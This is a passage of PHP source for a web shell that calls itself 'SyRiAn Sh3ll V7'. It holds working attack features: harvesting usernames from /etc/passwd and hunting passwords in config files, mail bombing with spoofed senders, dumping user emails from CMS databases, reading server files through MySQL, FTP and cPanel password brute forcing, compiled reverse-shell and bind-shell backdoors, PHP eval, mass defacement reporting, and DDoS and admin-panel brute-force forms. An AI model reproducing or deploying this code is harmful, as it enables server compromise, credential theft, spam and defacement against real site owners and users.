  1695.                    $pos=strpos($str,":");
  1696.                    $username=substr($str,0,$pos);
  1697.                    $dirz="/home/$username/public_html/";
  1698.                    if (($username!=""))
  1699.                    {
  1700.                        if (is_readable($dirz))
  1701.                        {
  1702.                            array_push($users,$username);
  1703.                            array_push($path_to_public,$dirz);
  1704.                        }
  1705.                    }
  1706.                 }
  1707.                 $i++;
  1708.             }
  1709.             echo "";
  1710.             echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
  1711.         ";
  1712.             echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
  1713.         ";
  1714.             echo "[~] Searching for passwords in config.* files...
  1715.         ";
  1716.             foreach ($users as $user)
  1717.             {
  1718.                    $path="/home/$user/public_html/";
  1719.                    read_dir($path,$user);
  1720.             }
  1721.             echo "[+] Done";
  1722.         }
  1723.         # --------------------------
  1724.         #   Mail Storm
  1725.         #---------------------------
  1726.         else if($_POST['sendMailStorm'])
  1727.         {
  1728.             $to=$_POST['to'];
  1729.             $nom=$_POST['nom'];
  1730.             $Comments=$_POST['Comments'];
  1731.             if ($to <> "" )
  1732.             {
  1733.                 for ($i = 0; $i < $nom ; $i++)
  1734.                 {
  1735.                     $from = rand (71,1020000000)."@"."Attacker.com";
  1736.                     $subject= md5("$from");
  1737.                     if(@mail($to,$subject,$Comments,"From:$from"))
  1738.                     echo "[+] $i spammed !!
  1739. ";
  1740.                     else
  1741.                     {
  1742.                         echo "[-] $i Failed !!
  1743. ";
  1744.                     }
  1745.                 }
  1746.             }
  1747.         }
  1748.         # --------------------------
  1749.         #   Extract Emails             
  1750.         #---------------------------
  1751.         else if($_POST['getEmails'])
  1752.         {
  1753.             $emhost = $_POST['EM_HOST'];
  1754.             $emuser = $_POST['EM_USER'];
  1755.             $empass = $_POST['EM_PASS'];
  1756.             $emdb = $_POST['EM_DB'];
  1757.             $emtab = $_POST['EM_TABLE'];
  1758.             $emcol = $_POST['EM_COLUMN'];
  1759.             $try2Connect = @mysql_connect($emhost,$emuser,$empass);
  1760.             if(!$try2Connect)
  1761.             {
  1762.                 echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
  1763. ";
  1764.             }
  1765.             $try2Select = @mysql_select_db($emdb);
  1766.             if(!$try2Select && $try2Connect)
  1767.             {
  1768.                 echo "[-] DB Name is Wrong !! . ";
  1769.             }
  1770.             $sql = @mysql_query("SELECT * FROM $emtab");
  1771.             while ($res = @mysql_fetch_array($sql))
  1772.             {
  1773.                 echo ''.$res["$emcol"].'
  1774. ';
  1775.             }
  1776.         }
  1777.         // Help
  1778.         else if($_POST['emailExtractorHelp'])
  1779.         {
  1780.             echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
  1781.  
  1782. [+] VBulletin
  1783. Table-name : user
  1784. column-name : email
  1785.  
  1786. [+] WordPress
  1787. Table-name : wp_users
  1788. column-name : user_email
  1789.  
  1790. [+] Joomla
  1791. Table-name : jos_users
  1792. column-name : email
  1793.  
  1794. [+] PHPBB
  1795. Table-name : phpbb_users
  1796. column-name : user_email
  1797.  
  1798. [+] I.P.Board
  1799. Table-name : ibf_members
  1800. column-name : email
  1801.  
  1802. [+] SMF
  1803. Table-name : smf_members
  1804. column-name : emailAddress ";
  1805.         }
  1806.         # --------------------------
  1807.         #   MySQL Query
  1808.         #---------------------------
  1809.         else if($_POST['MySQLQuery'])
  1810.         {
  1811.             $qu_host =$_POST['QU_HOST'];
  1812.             $qu_user =$_POST['QU_USER'];
  1813.             $qu_pass =$_POST['QU_PASS'];
  1814.             $qu_db =$_POST['QU_DB'];
  1815.             $query =$_POST['QU'];
  1816.             if (empty($_POST['QU_HOST']))
  1817.             $qu_host = 'localhost';
  1818.             $query = str_replace("\\","",$query);
  1819.             if (!empty($_POST['QU']))
  1820.             {
  1821.                 $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
  1822.                 if(!$tryConnection)
  1823.                 {
  1824.                     echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
  1825.                 }
  1826.                 else
  1827.                 {
  1828.                     $selectDB = @mysql_select_db($qu_db);
  1829.                     if(!$selectDB)
  1830.                     {
  1831.                         echo "[-] Database Name Is Wrong !!";
  1832.                     }
  1833.                     else
  1834.                     {
  1835.                         $qqok1 = mysql_query($query);
  1836.                         if(!$qqok1)
  1837.                         {
  1838.                             echo "[-] Can't Execute The Query";
  1839.                         }
  1840.                     }
  1841.                 }
  1842.                 @mysql_close();
  1843.             }
  1844.             if ($qqok1)
  1845.             {
  1846.                 update();
  1847.             }
  1848.         }
  1849.             # --------------------------
  1850.             #   SQL Reader
  1851.             #---------------------------
  1852.             else if ($_POST['sql2Read'])
  1853.             {
  1854.                 $host = $_POST['host'];
  1855.                 $user = $_POST['user'];
  1856.                 $pass = $_POST['pass'];
  1857.                 $db = $_POST['db'];
  1858.                 $unique = uniqid('N');
  1859.                 $file = $_POST['file'];
  1860.                 $file = str_replace('\\\\','\\',$file);
  1861.                 $query = array(
  1862.                 "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
  1863.                 "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
  1864.                 "SELECT * FROM $unique"
  1865.                 );
  1866.                 $connect = mysql_connect($host,$user, $pass);
  1867.                 mysql_select_db($db,$connect);
  1868.                 foreach($query as $Allqueries)
  1869.                 {
  1870.                     $mysqlQuery = mysql_query($Allqueries,$connect);
  1871.                     while($line = @mysql_fetch_row($mysqlQuery))
  1872.                     echo htmlspecialchars($line[0]);
  1873.                     echo "\n";
  1874.                 }
  1875.             }
  1876.             # --------------------------
  1877.             #   Edit File
  1878.             #---------------------------
  1879.             else if($_POST['editFileSubmit'])
  1880.             {
  1881.                 $file2Edit = $_POST['editFile'];
  1882.                 echo @file_get_contents($file2Edit);
  1883.             }
  1884.             else if($_POST['saveEditedFile'])
  1885.             {
  1886.                 $fileName = $_POST['file2edit'];
  1887.                 $newFile = $_POST['ExecutionArea'];
  1888.                 $trytoGenerate = GenerateFile($fileName,$newFile);
  1889.                 if($trytoGenerate)
  1890.                 {
  1891.                     echo "[+] File Saved !";
  1892.                 }
  1893.                 else
  1894.                 {
  1895.                     echo "[-] Failed To Save File !!"; 
  1896.                 }
  1897.             }
  1898.             # --------------------------
  1899.             #   Zone H Attacker
  1900.             #---------------------------
  1901.             else if($_POST['SendNowToZoneH'])
  1902.             {
  1903.                 ob_start();
  1904.                 $sub = @get_loaded_extensions();
  1905.                 if(!in_array("curl", $sub))
  1906.                 {
  1907.                     die('[-] Curl Is Not Supported !! ');
  1908.                 }
  1909.            
  1910.                 $hacker = $_POST['defacer'];
  1911.                 $method = $_POST['hackmode'];
  1912.                 $neden = $_POST['reason'];
  1913.                 $site = $_POST['domain'];
  1914.                
  1915.                 if (empty($hacker))
  1916.                 {
  1917.                     die ("[-] You Must Fill the Attacker name !");
  1918.                 }
  1919.                 elseif($method == "--------SELECT--------")
  1920.                 {
  1921.                     die("[-] You Must Select The Method !");
  1922.                 }
  1923.                 elseif($neden == "--------SELECT--------")
  1924.                 {
  1925.                     die("[-] You Must Select The Reason");
  1926.                 }
  1927.                 elseif(empty($site))
  1928.                 {
  1929.                     die("[-] You Must Inter the Sites List ! ");
  1930.                 }
  1931.                 $i = 0;
  1932.                 $sites = explode("\n", $site);
  1933.                 while($i < count($sites))
  1934.                 {
  1935.                     if(substr($sites[$i], 0, 4) != "http")
  1936.                     {
  1937.                         $sites[$i] = "http://".$sites[$i];
  1938.                     }
  1939.                     ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  1940.                     echo "Site : ".$sites[$i]." Defaced !\n";
  1941.                     ++$i;
  1942.                 }
  1943.                 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  1944.             }
  1945.             # --------------------------
  1946.             #   FTP And Cpanle Brute Force Attacker
  1947.             #---------------------------
  1948.             else if($_POST['BruteForceCpanelAndFTP'])
  1949.             {
  1950.                 $connect_timeout=5;
  1951.                 set_time_limit(0);
  1952.                 $submit=$_REQUEST['BruteForceCpanelAndFTP'];
  1953.                 $users=$_REQUEST['users'];
  1954.                 $pass=$_REQUEST['passwords'];
  1955.                 $target=$_REQUEST['target'];
  1956.                 $cracktype=$_REQUEST['cracktype'];
  1957.                
  1958.                 if(empty($target))
  1959.                 {
  1960.                     $target = "localhost";
  1961.                 }
  1962.                
  1963.                 function ftp_check($host,$user,$pass,$timeout)
  1964.                 {
  1965.                     $ch = curl_init();
  1966.                     curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  1967.                     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1968.                     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1969.                     curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1970.                     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1971.                     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1972.                     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1973.                     $data = curl_exec($ch);
  1974.                     if ( curl_errno($ch) == 28 )
  1975.                     {
  1976.                          print "Error : Connection Timeout Please Check The Target Hostname .";
  1977.                          exit;
  1978.                     }
  1979.                     elseif ( curl_errno($ch) == 0 )
  1980.                     {
  1981.                         print "[+] Cracking Success With Username ($user) and Password ($pass)";
  1982.                     }
  1983.                     curl_close($ch);
  1984.                 }
  1985.                 function cpanel_check($host,$user,$pass,$timeout)
  1986.                 {
  1987.                     $ch = curl_init();
  1988.                     curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  1989.                     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1990.                     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1991.                     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1992.                     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1993.                     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1994.                     $data = curl_exec($ch);
  1995.                     if ( curl_errno($ch) == 28 )
  1996.                     {
  1997.                         print "[-] Connection Timeout Please Check The Target Hostname .";
  1998.                         exit;
  1999.                     }
  2000.                     elseif ( curl_errno($ch) == 0 )
  2001.                     {
  2002.                         print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2003.                     }
  2004.                     curl_close($ch);
  2005.                 }
  2006.                 if(isset($submit) && !empty($submit))
  2007.                 {
  2008.                     if(empty($users) && empty($pass))
  2009.                     {
  2010.                         print "[-] Please Check The Users or Password List Entry . . .";
  2011.                     }
  2012.                     if(empty($users))
  2013.                     {
  2014.                         print "[-] Please Check The Users List Entry . . .";
  2015.                     }
  2016.                     if(empty($pass))
  2017.                     {
  2018.                         print "[-] Please Check The Password List Entry . . ";
  2019.                     }
  2020.                     $userlist=explode("\n",$users);
  2021.                     $passlist=explode("\n",$pass);
  2022.                     print "[~]# Cracking Process Started, Please Wait ...";
  2023.                     foreach ($userlist as $user)
  2024.                     {
  2025.                         $pureuser = trim($user);
  2026.                         foreach ($passlist as $password )
  2027.                         {
  2028.                             $purepass = trim($password);
  2029.                             if($cracktype == "ftp")
  2030.                             {
  2031.                                 ftp_check($target,$pureuser,$purepass,$connect_timeout);
  2032.                             }
  2033.                             if ($cracktype == "cpanel")
  2034.                             {
  2035.                                 cpanel_check($target,$pureuser,$purepass,$connect_timeout);
  2036.                             }
  2037.                         }
  2038.                     }
  2039.                 }
  2040.             }
  2041.             # --------------------------
  2042.             #   Back Connection
  2043.             #---------------------------
  2044.             else if($_POST['backconn'])
  2045.             {
  2046.                 if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  2047.                 {
  2048.                     $ip = trim($_POST['ip']);
  2049.                     $port = trim($_POST['backport']);
  2050.                     tulis("bcc.c",$back_connect_c);
  2051.                     Exe('gcc -o bcc bcc.c');
  2052.                     Exe('chmod 777 bcc');
  2053.                     @unlink('bcc.c');
  2054.                     Exe("./bcc ".$ip." ".$port." &");
  2055.                     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2056.                 }
  2057.                 elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  2058.                 {
  2059.                     $ip = trim($_POST['ip']);
  2060.                     $port = trim($_POST['backport']);
  2061.                     tulis("bcp",$back_connect);
  2062.                     Exe("chmod +x bcp");
  2063.                     $p2=which("perl");
  2064.                     Exe($p2." bcp ".$ip." ".$port." &");
  2065.                     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2066.                 }
  2067.             }
  2068.             # --------------------------
  2069.             #   Bind Connection
  2070.             #---------------------------
  2071.             else if($_POST['bind'])
  2072.             {
  2073.                 if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  2074.                 {
  2075.                     $port = trim($_POST['port']);
  2076.                     $passwrd = trim($_POST['bind_pass']);
  2077.                     tulis("bdc.c",$port_bind_bd_c);
  2078.                     Exe('gcc -o bdc bdc.c');
  2079.                     Exe('chmod 777 bdc');
  2080.                     @unlink("bdc.c");
  2081.                     Exe("./bdc ".$port." ".$passwrd." &");
  2082.                     $scan = Exe("ps aux");
  2083.                     if(eregi("./bdc $por",$scan))
  2084.                     {
  2085.                         $msg = "Process found running, backdoor setup successfully.";
  2086.                     }
  2087.                     else
  2088.                     {
  2089.                         $msg = "Process not found running, backdoor not setup successfully.";
  2090.                     }
  2091.                 }
  2092.                
  2093.                 elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  2094.                 {
  2095.                     $port = trim($_POST['port']);
  2096.                     $passwrd = trim($_POST['bind_pass']);
  2097.                     tulis("bdp",$port_bind_bd_pl);
  2098.                     Exe("chmod 777 bdp");
  2099.                     $p2=which("perl");
  2100.                     Exe($p2." bdp ".$port." &");
  2101.                     $scan = Exe("ps aux");
  2102.                     if(eregi("$p2 bdp $port",$scan))
  2103.                     {
  2104.                         $msg = "Process found running, backdoor setup successfully.";
  2105.                     }  
  2106.                     else
  2107.                     {
  2108.                         $msg = "Process not found running, backdoor not setup successfully.";
  2109.                     }
  2110.                 }  
  2111.             }
  2112.  
  2113.        
  2114.     echo "</textarea>";
  2115.     if($_POST['editFileSubmit'])
  2116.     {
  2117.         echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
  2118.         echo "<input type='submit' value='Save' name='saveEditedFile'>";
  2119.     }
  2120.     echo "</form>
  2121.  
  2122.     <!-- Main Table -->
  2123.     <table width='100%'><tr>
  2124.     <td width='30%' height=30>
  2125.     <!-- End Of Main Table -->
  2126.     <!-- Commands Alias-->
  2127.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2128.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2129.    <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
  2130.     <!-- End Of Commands Alias-->
  2131.     </td>
  2132.     <td width='30%' height=30>
  2133.     <!-- Command Line -->
  2134.     <form method='POST'>
  2135.     <table width='100%' height='72' border='0'  id='Box'><tr>
  2136.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2137.    <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
  2138.     <input type='text' name='cmd' id='commandLine' value='dir' size=59>
  2139.     <input type='text' name='directory' value=".getcwd()." size=59>
  2140.     <input name='Execute' id='Execute' type='submit' value='Execute' >
  2141.     </td></tr></table></form>
  2142.     <!-- End Of Command Line -->
  2143.     </td>
  2144.     <td width='30%' height=30>
  2145.     <!-- Edit File -->
  2146.     <form method=POST>
  2147.     <table width='100%' height='72' border='0'  id='Box'><tr>
  2148.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2149.    <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
  2150.     <input type='text' name='editFile' size=59>
  2151.     <input name='editFileSubmit' type='submit' value='Edit'>
  2152.     </td></tr></table></form>
  2153.     <!-- End Of Edit File -->
  2154.     </td>
  2155.     </tr>
  2156.     <tr>
  2157.     <td width='30%'>
  2158.     <!-- Chmod Force -->
  2159.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2160.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2161.    <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
  2162.     <input type='text' name='fileName' value='index.php' size=48>
  2163.     <br/><input type='text' name='per' value='0644' size='10'>
  2164.     <input type=submit value='Change Now !' name='changePermission'>
  2165.     </td></tr></table></form>
  2166.     <!-- End Of Chmod Force -->
  2167.     </td>
  2168.     <td>
  2169.     <!-- Get File -->
  2170.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2171.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2172.    <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
  2173.     <input type='text' name='fileUrl' size='59' value='http://www.'>
  2174.     <select name=getType>
  2175.     <option value=wget>wget</option>
  2176.     <option value='curl -o'>curl -o</option>
  2177.     <option value=get>get</option>
  2178.     <option value='lynx -source'>lynx -source</option>
  2179.     </select>
  2180.     <input name=getFile type=submit value='Get File' >
  2181.     </td></tr></table></form>
  2182.     <!-- End Of Get File -->
  2183.     </td>
  2184.     <td>
  2185.     <!-- Bind Connection -->
  2186.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2187.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2188.    <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
  2189.     <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
  2190.     <input type='text' name='port' size='26' value='443'>
  2191.     <select class='inputz' size='1' name='use'>
  2192.     <option value='Perl'>Perl</option><option value='C'>C</option>
  2193.     </select>
  2194.     <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
  2195.     </td></tr></table></form>
  2196.     <!-- End Of Bind Connection -->
  2197.     </td>
  2198.     </tr>
  2199.     <tr>
  2200.     <td>
  2201.     <!-- CGI perl -->
  2202.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2203.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2204.    <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
  2205.     <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
  2206.     <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
  2207.     <!-- End Of CGI perl -->
  2208.     </td><td>
  2209.     <!-- Forbidden -->
  2210.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2211.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2212.    <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
  2213.     <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
  2214.     <select name='403'>
  2215.     <option value='DirectoryIndex'>DirectoryIndex</option>
  2216.     <option value='HeaderName'>HeaderName</option>
  2217.     <option value='TXT'>TXT</option>
  2218.     <option value='404'>404</option>
  2219.     <option value='ReadmeName'>ReadmeName</option>
  2220.     <option value='footerName'>footerName</option>
  2221.     </select>
  2222.     <input type='submit' value='Generate' name='generateForbidden'>
  2223.     </td></tr></table></form>
  2224.     <!-- End Of Forbidden -->
  2225.     </td>
  2226.     <td>
  2227.     <!-- Back Connection -->
  2228.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2229.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2230.    <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
  2231.     <input type='text' name='ip' size='26' value='".GetRealIP()."'>
  2232.     <input type='text' name='backport' size='26' value='443'>
  2233.     <select name='use'>
  2234.     <option value='Perl'>Perl</option>
  2235.     <option value='C'>C</option>
  2236.     </select>
  2237.     <input type='submit' name='backconn' value='Connect'>
  2238.     </td></tr></table></form>
  2239.     <!-- End Of Back Connection -->
  2240.     </td>
  2241.     </tr>
  2242.     <tr>
  2243.     <td>
  2244.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2245.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2246.    <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
  2247.     <input type='text' name='hashToAnalyze' size=60>
  2248.     <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
  2249.     </td>
  2250.     <td>
  2251.     <!-- Eval Code -->
  2252.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2253.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2254.    <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
  2255.     <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
  2256.     <input type=submit name=submitEval value=Eval></td></tr></table></form>
  2257.     <!-- End Of Eval Code -->
  2258.     </td>
  2259.     <td>
  2260.     <!-- Users & Domains -->
  2261.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2262.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2263.    <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
  2264.     <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
  2265.     <input type='submit' name='GenerateUsers' Value='Generate'>
  2266.     <!-- End Of Users & Domains -->
  2267.     </td></tr></table></form>
  2268.     </td>
  2269.     </tr>
  2270.     <tr>
  2271.     <td>
  2272.     <!-- Reading Files -->
  2273.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2274.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2275.    <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
  2276.     <input type='text' value='/etc/passwd' name='file' size=35>
  2277.     <input class='buttons' type='submit' name='read' value='Read File'>
  2278.     <input class='buttons' type='submit' name='show' value='Show directory'>
  2279.     </td></tr></table></form>
  2280.     <!-- End Of Reading Files -->
  2281.     </td>
  2282.     <td>
  2283.     <!--Encryption -->
  2284.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2285.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2286.    <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
  2287.     <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
  2288.     <input type='submit' value='Encrypt' name='encryptNow'>
  2289.     </td></tr></table></form>
  2290.     <!-- End Of Encryption -->
  2291.     </td>
  2292.     <td>
  2293.     <!-- Metasploit RC -->
  2294.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2295.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2296.    <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
  2297.     <input type='text' size='15' name='ip' value='127.0.0.1'>
  2298.     <input type='text' size='5' name='port' value='443'>
  2299.     <input type='submit' value='Connect' name='metaConnect'>
  2300.     </td></tr></table></form>
  2301.     <!-- End Of Metasploit RC -->
  2302.     </td>
  2303.     </tr>
  2304.     <tr>
  2305.     <td>
  2306.     <!-- DDOS Attacker -->
  2307.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2308.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2309.    <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
  2310.     <input type='text' name='ipToAttack' size='40' value='Target IP'>
  2311.     <input type='text' name='portToAttack' size='20' value='Target PORT'>
  2312.     <input type='submit' name='StartAttack' value='Attack'>
  2313.     </td></tr></table></form>
  2314.     <!-- End Of DDOS Attacker -->
  2315.     </td>
  2316.     <td>
  2317.     <!-- Ports Scanner -->
  2318.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2319.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2320.    <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
  2321.     <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
  2322.     </td></tr></table></form>
  2323.     <!-- End Of Ports Scanner -->
  2324.     </td>
  2325.     <td>
  2326.     <!-- ACP Finder -->
  2327.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2328.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2329.    <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
  2330.     <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
  2331.     <input type='text' value='.php' name='extention'/>
  2332.     <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
  2333.     <!-- End Of ACP Finder -->
  2334.     </td></tr></table></form>
  2335.     </td>
  2336.     </tr>
  2337.    
  2338.     <tr>
  2339.     <br>
  2340.     <td valign='top'>
  2341.     <!-- Server ShortCut -->
  2342.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2343.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2344.    <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
  2345.     <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
  2346.     <input type='submit' name='generateSER' value=' Generate '>
  2347.     </td></tr></table></form>
  2348.     <!-- End Of Server ShoutCut -->
  2349.     </td>
  2350.     <td valign='top'>
  2351.     <!-- Fast Tools -->
  2352.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2353.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2354.    <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
  2355.     <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
  2356.     <input type=submit value='Generate php.ini' name='phpiniGenerate'>
  2357.     <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
  2358.     <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
  2359.     <input type='submit' name='showUsers' value='Show Users' />
  2360.     </td></tr></table></form>
  2361.     <!-- End Of Fast Tools -->
  2362.     </td>
  2363.     <td valign='TOP'>
  2364.     <!-- SQL Reader -->
  2365.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2366.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2367.    <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
  2368.     <input type='text' value='/etc/passwd' name='file' size='35'><br/>
  2369.     <input type='text' name='host' value='127.0.0.1'>
  2370.     <input type='text' name='user' value='DB user'>
  2371.     <input type='text' name='pass' value='DB pass'>
  2372.     <input type=text name='db' value='DB name'>
  2373.     <input type='submit' name='sql2Read' value='Read'>
  2374.     ";
  2375.     if($sql_con)
  2376.     {
  2377.         echo '<input style="width:300px;" type="text" name="filetoread">
  2378.         <input type="submit" value="Read" name="SQLToRead">';
  2379.     }
  2380.     echo "</td></tr></table></form>
  2381.     <!-- End Of SQL Reader  -->
  2382.     </td>
  2383.     </tr>
  2384.     <tr>
  2385.     <td valign='top'>
  2386.         <!-- Mail Storm -->
  2387.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2388.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2389.    <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
  2390.     <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
  2391.     <input type='text' name='to' value='Target Email' >
  2392.     <input type='text' size='5' name='nom' value='100'>
  2393.     <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
  2394.     </td></tr></table></form>
  2395.     <!-- End Of Mail Storm -->
  2396.     </td>
  2397.     <td valign='top'>
  2398.     <!-- SQL Query -->
  2399.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2400.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2401.    <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
  2402.     <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
  2403.     <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
  2404.     <input type = 'text' name=\&quot;QU_PASS\&quot; value='DB Pass'>
  2405.     <input type=text name=\&quot;QU_DB\&quot; value='DB Name' >
  2406.     <textarea name='QU'  rows=2 cols=50>SELECT * FROM emp ;</textarea>
  2407.     <input name='MySQLQuery' type='submit'>
  2408.     </td></tr></table></form>
  2409.     <!-- SQL Query  -->
  2410.     </td>
  2411.     <td valign='top'>
  2412.     <!-- Email Extractor -->
  2413.     <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2414.    <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2415.    <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
